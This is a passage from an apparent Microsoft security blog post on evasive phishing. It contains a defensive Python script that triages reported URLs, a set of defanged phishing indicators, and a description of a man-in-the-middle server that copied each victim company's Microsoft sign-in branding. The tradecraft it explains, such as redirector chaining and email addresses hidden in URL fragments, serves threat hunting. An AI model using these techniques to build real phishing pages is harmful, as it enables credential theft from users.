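    for blob in (parts.query, parts.fragment):
        params = parse_qs(blob, keep_blank_values=True)
        if "btnI" in params and "q" in params:
            # The kit wrapped the keyword in <a>...</a>; strip any markup around it.
            return re.sub(r"<[^>]+>", "", params["q"][0]).strip()
    return None


def decode_fragment_token(fragment: str):
    """Kits commonly pass the target's address base64url-encoded in the fragment so the page
    can prefill the username while the server log never records it. Best-effort decode."""
    if not B64URL.match(fragment):
        return None
    try:
        text = base64.urlsafe_b64decode(fragment + "=" * (-len(fragment) % 4)).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    text = text.strip()
    return text if "@" in text else None


def normalize_path(path: str) -> str:
    """Replace hash-like path segments so random paths on a custom-404 host collapse."""
    return "/".join("<hash>" if HEX_BLOB.match(seg) else seg for seg in path.split("/"))


def cluster_hosts(hosts, min_prefix: int = 8):
    """Group hosts by parent domain, then merge sibling subdomains sharing a long common
    prefix (outlookloffice365user + random tail). Returns {cluster_key: [hosts]}."""
    def join(sub, parent):
        return f"{sub}.{parent}" if sub else parent

    by_parent = {}
    for host in hosts:
        labels = host.lower().split(".")
        by_parent.setdefault(".".join(labels[-2:]), set()).add(".".join(labels[:-2]))
    clusters = {}
    for parent, subs in by_parent.items():
        group = []
        for sub in sorted(subs) + [None]:
            flush = group and (sub is None or len(os.path.commonprefix([group[0], sub])) < min_prefix)
            if flush:
                key = f"{os.path.commonprefix(group)}*.{parent}" if len(group) > 1 else join(group[0], parent)
                clusters[key] = [join(g, parent) for g in group]
                group = []
            if sub is not None:
                group.append(sub)
    return clusters


def analyze(defanged_urls):
    """Triage a batch of reported URLs: redirector keywords, fragment tokens, host clusters."""
    urls = [refang(u) for u in defanged_urls]
    parts = [urlsplit(u) for u in urls]
    report = {"redirector_keywords": [], "fragment_tokens": [], "normalized": []}
    for url, p in zip(urls, parts):
        keyword = search_redirector_keyword(url)
        if keyword:
            report["redirector_keywords"].append(keyword)
        token = decode_fragment_token(p.fragment)
        if token:
            report["fragment_tokens"].append(token)
        report["normalized"].append(f"{p.hostname}{normalize_path(p.path)}")
    report["host_clusters"] = cluster_hosts(
        p.hostname for p in parts if p.hostname and not GOOGLE_HOST.match(p.hostname)
    )
    return report


# Indicators as quoted on this page, except the web.app fragments, which are constructed.
SAMPLE_URLS = [
    "hxxps://www[.]google[.]ru/#btnI&q=%3Ca%3EhOJoXatrCPy%3C/a%3E",
    "hxxps://www[.]google[.]ru/#btnI&q=%3Ca%3EyEg5xg1736iIgQVF%3C/a%3E",
    "hxxps://skype-online8024[.]web[.]app/8cc1083b0ffdf1e5b9594c045c825b02d41d8cd98f00b204e9800998ecf8427e#dXNlckBleGFtcGxlLmNvbQ",
    "hxxps://skype-online8024[.]web[.]app/8cc1083b0ffdf1e5b9594c045c825b02d41d8cd98f00b204e9800998ecf8427e#dXNlckBleGFtcGxlLmNvbQs",
    "hxxps://outlookloffice365usertcph4l3q[.]web[.]app/",
    "hxxps://outlookloffice365userdqz75j6h[.]web[.]app/",
    "hxxps://outlookloffice365usery6ykxo07[.]web[.]app/",
]

if __name__ == "__main__":
    for key, value in analyze(SAMPLE_URLS).items():
        print(f"{key}: {value}")
```

The two Google links yield the keywords hOJoXatrCPy and yEg5xg1736iIgQVF, which is what you would search for (from the right region) to find the redirector host, and the seven reported URLs reduce to two clusters: one fixed skype-online8024 host with a hash-shaped path, and one outlookloffice365user* family with a random suffix. Hunting on the cluster key rather than the literal URL is what keeps up with a kit that mints a new URL per recipient.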

Man-in-the-middle component for dynamic phishing attack

Phishers have also been getting better at impersonation: the more legitimate the phishing emails looked, the better their chances at tricking recipients. Countless brands both big and small have been targets of spoofing by phishers.

One particular phishing campaign in 2019 took impersonation to the next level. Instead of copying elements from the spoofed legitimate website, a man-in-the-middle component fetched company-specific information like logos, banners, text, and background images from Microsoft’s rendering site.

Phishers sent out emails with URLs pointing to an attacker-controlled server, which served as the man-in-the-middle component and simulated Microsoft sign-in pages. The server derived certain information from the recipient’s email address, including the target company, and then gathered the branding specific to that company. The result was the exact same experience as the legitimate sign-in page, which could significantly reduce suspicion.

Figure 7. Phishing attack that abuses Microsoft’s rendering site

Using the same URL, the phishing site was rendered differently for different targeted users. To generate legitimate-looking phishing sites, the server used the following code to retrieve the banner used by the target victim’s company, as identified by the domain in the email address; the response is the URL for the company banner:

Figure 8. Code snippet for requesting the banner

The server also retrieved the text used in the company’s sign-in page; the response is the actual text specific to the target victim’s company:

Figure 9. Code snippet for requesting the company-specific text

To complete the legitimate-looking phishing page, the server requested the background image using the code below; the response is the URL to the image:

Figure 10. Code snippets for requesting the background image

Office 365 ATP: Durable and dynamic defense for evolving email threats

The phishing techniques that we discussed in this blog are vastly different from each other, but they are all clever attempts to achieve something that is very important for phishers and other cybercrooks: stealth. The longer phishers can quietly hide from security solutions, the more chances they have to invade inboxes and trick people into divulging sensitive information.

To hunt down phishing and other threats that don’t want to be found, Office 365 ATP uses advanced security technologies that expose sophisticated techniques. Our URL detonation technology can follow the attack chain so it can detect threats even if they hide behind legitimate services and multiple layers of redirectors.

This rich visibility into email threats allows Office 365 ATP to continuously inform and improve its heuristic and machine learning protections so that new and emerging campaigns are blocked in real-time—silently protecting customers from attacks even when they don’t know it. The insights from Office 365 ATP also allow our security experts to track emerging techniques and other attacker activities like the ones we discussed in this blog, allowing us to ensure that our protections are effective not just for the campaigns that we see today but those that might emerge in the future.

In addition, with the new campaign views in Office 365 ATP currently in preview, enterprises can get a broad picture of email campaigns observed in their network, with details like when the campaign started, the sending pattern and timeline, the list of IP addresses and senders used in the attack, which messages were blocked or otherwise, and other important information.

As an important component of Microsoft Threat Protection, Office 365 ATP provides critical security signals about threats that arrive via email, a common entry point for cyberattacks, to the rest of Microsoft’s security technologies, helping provide crucial protection at the early stages of attacks. Through signal-sharing and remediation orchestration across security solutions, Microsoft Threat Protection provides comprehensive and integrated protection for identities, endpoints, user data, apps, and infrastructure.

Patrick Estavillo
Office 365 ATP Research Team

Read all Microsoft security intelligence blog posts.

Follow us on Twitter @MsftSecIntel.

The post The quiet evolution of phishing appeared first on Microsoft Security.